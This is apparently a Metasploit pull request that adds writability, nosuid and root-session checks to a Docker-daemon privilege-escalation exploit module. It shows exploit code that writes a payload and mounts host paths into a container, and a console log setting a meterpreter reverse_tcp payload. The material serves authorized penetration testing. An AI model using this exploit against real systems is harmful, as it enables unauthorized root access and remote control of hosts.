### PR TITLE
Add check for writable and nosuid WritableDir

### DIFF
--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
       }
     ))
     register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
       OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
     ])
   end
 
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
   def check
     if cmd_exec('docker ps && echo true') =~ /true$/
+      print_good("Docker daemon is accessible.")
       Exploit::CheckCode::Vulnerable
     else
       print_error("Failed to access Docker daemon.")
@@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    if nosuid? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
+    end
+
     pl = generate_payload_exe
-    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
     print_status("Writing payload executable to '#{exe_path}'")
 
     write_file(exe_path, pl)
@@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def shell_script(exploit_path)
-    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
+    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
     dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
 
     %Q{

--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 


### PR DESCRIPTION
This PR adds enhances the `exploit/linux/local/docker_daemon_privilege_escalation` module (added in #7027) to check whether the user-specified `WritableDir` is writable and mounted without `nosuid`.

Before these changes:

* If the `WritableDir` was not writable, the module would (likely) fail horribly
* If the `WritableDir` was mounted `nosuid`, the module would fail to privesc - probably return a new low-privileged session or no new session.

While I was at it, a check for `CheckCode::Vulnerable` within the `exploit` method, and an associated `ForceExploit` code pattern, were added.

I haven't tested these changes on a vulnerable system. I have, however, at least verified that the changes appear to not horribly break the module on a non-vulnerable system.

```
msf5 exploit(multi/handler) > use exploit/linux/local/docker_daemon_privilege_escalation 
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set verbose true
verbose => true
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > check

[-] Failed to access Docker daemon.
[*] The target is not exploitable.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > options

Module options (exploit/linux/local/docker_daemon_privilege_escalation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 1
set lhost 127.0.0.1       set lhost 172.16.191.188  set lhost 172.16.191.196  
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[-] Failed to access Docker daemon.
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > 
```
